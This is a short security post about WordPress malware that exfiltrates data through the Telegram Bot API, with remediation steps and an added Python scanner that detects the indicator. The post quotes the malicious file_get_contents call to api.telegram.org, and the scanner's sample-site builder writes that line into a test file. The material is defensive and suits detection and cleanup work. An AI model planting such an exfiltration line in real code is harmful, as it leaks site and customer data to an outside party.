Conspiracy Revelation: 28.9.2020: I removed the Telegram APIs manually from all infected files…
"file_get_contents("https://api.telegram.org/xxxxxxxx:AAE1-wpQyYquqvB7wOeBzzmPafEp0d81e6c/sendMessage?chat_id=1110165405&text=" . urlencode$"
"The malware looks to be infecting WordPress' core files and the "File Manager" and "WooCommerce" plugins for now, including the latest versions of WordPress (5.5) and WooCommerce (4.4.1). The files that seem to be affected are:
wp-file-manager/lib/files/HhGFXU.php (and other randomly named .php files)
Expressions that can help to determine if your site is compromised are:
Since the code above is not hashed or obfuscated, it is extremely difficult to scan for with a security plugin like Wordfence or Sucuri, so manual intervention is advised.
Steps to resolve
The basic steps to resolve this are to replace all the WordPress core files with clean wp-admin and wp-includes folders and to do a fresh re-install of the WooCommerce and WP File Manager plugins. Always make sure to take a backup before attempting this.
Also, in no case should there be any references to those strings anywhere in your website's files or database (with the exception of the 2nd string when using the official Telegram plugin).
Lastly, it is recommended to check on newly created WordPress usernames that might be injected into the database as well.
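As an added example (not code from this post or the quoted write-up), a small Python scanner for the indicators described above: it walks a WordPress install, flags PHP files containing a Telegram Bot API sendMessage call, and flags any PHP file sitting in the File Manager plugin's upload directory. It assumes the plugin lives under wp-content/plugins/ as in a standard install, and the sample site it builds is constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Indicator from the write-up: a Telegram Bot API sendMessage call used to exfiltrate
# data. Token and chat_id are matched generically, not the redacted values quoted above.
TELEGRAM_EXFIL = re.compile(
    r"api\.telegram\.org/[^/\"'\s]+/sendMessage\?chat_id=\d+", re.IGNORECASE
)
# The write-up names wp-file-manager/lib/files/ as where random .php files appeared; that
# directory holds uploads and should never contain PHP. Assumed under wp-content/plugins/.
FILE_MANAGER_UPLOAD_DIR = "wp-file-manager/lib/files/"


def scan_wordpress(root):
    """Return {relative posix path: [reasons]} for suspicious .php files under root."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*.php"):
        rel = path.relative_to(root).as_posix()
        try:
            text = path.read_text(encoding="utf-8", errors="ignore")
        except OSError:
            continue  # unreadable file: skip it rather than abort the whole scan
        reasons = []
        if TELEGRAM_EXFIL.search(text):
            reasons.append("telegram-sendmessage-exfil")
        if FILE_MANAGER_UPLOAD_DIR in rel:
            reasons.append("php-in-file-manager-upload-dir")
        if reasons:
            findings[rel] = reasons
    return findings


def build_sample_site():
    """Constructed sample tree: a clean core file, an infected core file and a dropped file."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    files = {
        "wp-includes/version.php": "<?php\n$wp_version = '5.5';\n",
        "wp-admin/admin.php": (
            "<?php\nfile_get_contents(\"https://api.telegram.org/xxxxxxxx:PLACEHOLDER_TOKEN"
            "/sendMessage?chat_id=123456&text=\" . urlencode($data));\n"
        ),
        "wp-content/plugins/" + FILE_MANAGER_UPLOAD_DIR + "HhGFXU.php": "<?php echo 'x';\n",
    }
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root
```

Run `scan_wordpress("/path/to/wordpress")` against a real install; every hit in a core file or plugin directory is a file to restore from a clean copy, as the steps above describe.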